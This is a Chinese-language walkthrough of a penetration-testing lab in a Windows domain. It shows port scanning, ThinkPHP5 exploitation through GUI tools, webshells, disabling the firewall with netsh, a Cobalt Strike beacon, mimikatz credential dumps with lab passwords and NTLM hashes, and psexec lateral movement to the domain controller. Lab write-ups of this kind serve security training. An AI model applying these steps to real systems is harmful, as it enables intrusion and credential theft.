环境搭建
虚拟机密码
win7
sun\heart 123.com
sun\Administrator dc123.com(因为过期了,改成Admin12345)
2008
sun\admin 2020.com(改成2022.com)
Win7双网卡模拟内外网
仅主机模式网卡:192.168.138.0
NAT模式网卡:192.168.135.0
配置好后需要进入win7主机将phpstudy服务开起来
emmm试了一下又是不能ping通的,但是网页能正常访问
考点思路
一、环境搭建
二、漏洞利用
3.漏洞搜索与利用
4.漏洞利用Getshell
5.系统信息收集
6.主机密码收集
三、内网搜集
7.内网–继续信息收集
8.内网攻击姿势–MS14-058
9.内网攻击姿势–MS17-010
四、横向移动
10.psexec远控
11.内网其它主机端口
12.netsh增删防火墙规则
五、构建通道
六、持久控制
七、痕迹清理
外网打点
先arp-scan -l看一下存活主机
拿到web服务器地址:192.168.135.150
做一下端口扫描
nmap -sS -v 192.168.135.150
|
扫出来两个端口信息
PORT STATE SERVICE 80/tcp open http 3306/tcp open mysql
|
然后fscan扫出来一个135端口开放,但是我的fscan漏洞探测不了不知道为什么,我们手动去看一下
访问一下80端口的服务可以看到是一个thinkphp5的服务
用工具:https://github.com/Lotus6/ThinkphpGUI/releases/tag/1.3或者https://github.com/bewhale/thinkphp_gui_tools看看能不能一把梭,不过最好使用java8来运行,这里可以去Oracle下载一个java8的jdk
解压
tar -xzvf jdk-8u401-linux-x64.tar.gz
|
有点男泵,这台kali一直说我超内存,我换了一台kali就可以了
可以看到扫出了四个洞了,这下可以一把梭了
选择对应poc执行一下
发现可以成功,那这时候就直接getshell蚁剑连一下
成功连接
不过为了方便上传cs马这里还是上传一个冰蝎马来连接
然后关一下防火墙先
netsh advfirewall set allprofiles state off
|
然后上传一个cs的木马
然后运行
可以看到主机成功上线
内网渗透
常规net view看一下主机
可以看到域控的地址为:192.168.138.138
然后mimikatz进行logonpasswords拿一下密码信息
Authentication Id : 0 ; 151193 (00000000:00024e99) Session : Interactive from 1 User Name : Administrator Domain : SUN Logon Server : DC Logon Time : 2024/11/21 12:44:44 SID : S-1-5-21-3388020223-1982701712-4030140183-500 msv : [00000003] Primary * Username : Administrator * Domain : SUN * LM : ac804745ee68ebea48116059303a4365 * NTLM : ccef208c6485269c20db2cad21734fe7 * SHA1 : 58d1a25c09f4ee98209941b2b333fbe477d472a9 tspkg : * Username : Administrator * Domain : SUN * Password : Admin12345 wdigest : * Username : Administrator * Domain : SUN * Password : Admin12345 kerberos : * Username : Administrator * Domain : SUN.COM * Password : Admin12345 ssp : credman :
Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2024/11/21 12:44:36 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman :
Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : WIN7$ Domain : SUN Logon Server : (null) Logon Time : 2024/11/21 12:44:36 SID : S-1-5-20 msv : [00000003] Primary * Username : WIN7$ * Domain : SUN * NTLM : 19a799ef7003f143f69e5eb204369f74 * SHA1 : e7a55023d5275327b14b77af9fb37f9929ce114d tspkg : wdigest : * Username : WIN7$ * Domain : SUN * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 kerberos : * Username : win7$ * Domain : SUN.COM * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 ssp : credman :
Authentication Id : 0 ; 46807 (00000000:0000b6d7) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2024/11/21 12:44:36 SID : msv : [00000003] Primary * Username : WIN7$ * Domain : SUN * NTLM : 19a799ef7003f143f69e5eb204369f74 * SHA1 : e7a55023d5275327b14b77af9fb37f9929ce114d tspkg : wdigest : kerberos : ssp : credman :
Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : WIN7$ Domain : SUN Logon Server : (null) Logon Time : 2024/11/21 12:44:36 SID : S-1-5-18 msv : tspkg : wdigest : * Username : WIN7$ * Domain : SUN * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 kerberos : * Username : win7$ * Domain : SUN.COM * Password : db cc 80 3b b4 2a 72 b6 e9 7c 58 55 7d d4 39 9f c4 54 c6 09 ce f4 bf e6 dc 51 d9 be e0 fd e6 85 ff 87 b2 fd 38 ea ff 04 0c 9f cf 6f e6 26 01 9d 0c 48 06 6c 2c 4a 3e b3 26 77 b3 44 65 c6 04 37 bb 5c 5c cb 86 3d b3 4c 94 3a 96 92 e1 65 2a 94 7e 4b 43 ff 8f 0c b3 2e 5d 50 23 29 f8 55 70 c4 e3 41 a9 66 94 d2 38 40 af 9f 3c f6 b0 31 10 8e 21 22 0e 76 25 52 76 64 a7 95 3e b2 85 58 5f fa 18 2e bd 4f e3 99 6e 1d 49 80 00 8a 30 f2 aa 39 66 e1 36 9c 79 ad 7c cd fb ec c4 b8 2a 33 21 1c 9a 82 e3 8a e4 5e 12 f2 60 94 f0 ed fb ad 83 b5 9d 35 dd cd ac bd 23 3c 2d 6c a9 3a aa 93 60 c9 d6 1f 5a b9 95 5d 41 fb 70 02 ea 2c d1 8d b3 6f 82 70 0a 34 bf f3 10 42 25 56 e3 a9 b6 71 f5 03 f8 6f 84 6e 66 fa 9f 7b 23 43 ad f9 eb 15 43 59 ssp : credman :
|
管理员密码相关的信息我们也已经找到了
用户哈希也拿一下
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::
|
打域控
接下来就是要拿下域控了
既然都拿到hash了那就直接psexec横向移动一把梭了
建立一个smb监听器
然后直接jump psexec
成功上线
psexec能一把梭主要还是DC主机开了$ADMIN共享管道
这台靶机比前面的简单挺多的
其实应该win7靶机用普通用户登录才对,这样我们才需要提权
查找提权漏洞的话我们可以用systeminfo保存下系统信息,然后用wesng工具来搜索
python wes.py sysinfo.txt --impact "Elevation of Privilege"
|
然后就可以找到各种漏洞信息了
exp漏洞库:https://www.exploit-db.com/